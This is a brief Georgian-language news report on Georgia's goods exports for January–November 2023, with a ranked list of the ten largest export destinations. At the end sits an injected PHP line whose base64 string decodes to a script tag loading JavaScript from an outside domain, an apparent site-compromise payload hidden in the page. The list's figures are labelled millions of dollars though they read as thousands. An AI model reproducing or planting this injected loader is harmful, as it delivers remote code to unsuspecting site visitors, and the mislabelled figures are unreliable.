celsiusi
ავერსი შნაიდერი

2023 წლის იანვარ-ნოემბერში საქართველოდან საქონლის ექსპორტის მოცულობამ 5 მილიარდ 584 მილიონი დოლარი შეადგინა, რაც გასული წლის შესაბამისი პერიოდის მაჩვენებელზე 11.1%-ით მეტია.

სტატისტიკის ეროვნული სამსახურის მონაცემებით, ადგილობრივი ექსპორტი (ექსპორტი რეექსპორტის გარეშე), მთლიანი ექსპორტის 46.0%-ს შეადგენს. აღნიშნული მაჩვენებელი წინა წლის შესაბამის პერიოდთან შედარებით 24.3%-ით შემცირდა და 2 მილიარდ 569 მილიონ დოლარს გაუტოლდა.

ამასთან, 2023 წლის იანვარ-ნოემბერში ათი უმსხვილესი ქვეყნის წილმა საქართველოს მთლიან ადგილობრივ ექსპორტში 73.3% შეადგინა.

უმსხვილესი საექსპორტო ქვეყნების ჩამონათვალი ადგილობრივ ექსპორტში:

  • რუსეთი - 495 184 მლნ აშშ დოლარი (19,3%)
  • თურქეთი - 328 703 მლნ აშშ დოლარი (12.8%)
  • ბულგარეთი - 247 595 მლნ აშშ დოლარი (9.6%)
  • ჩინეთი - 246 129 მლნ აშშ დოლარი (9.6%)
  • სომხეთი - 142 320 მლნ აშშ დოლარი (5.5%)
  • აზერბაიჯანი - 138 375 მლნ აშშ დოლარი (5.4%)
  • შვეიცარია - 79 016 მლნ აშშ დოლარი (3.1%)
  • აშშ - 71 413 მლნ აშშ დოლარი (2.8%)
  • ესპანეთი - 69 693 მლნ აშშ დოლარი (2.7%)
  • უკრაინა - 65 761 მლნ აშშ დოლარი (2.6%)

278
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");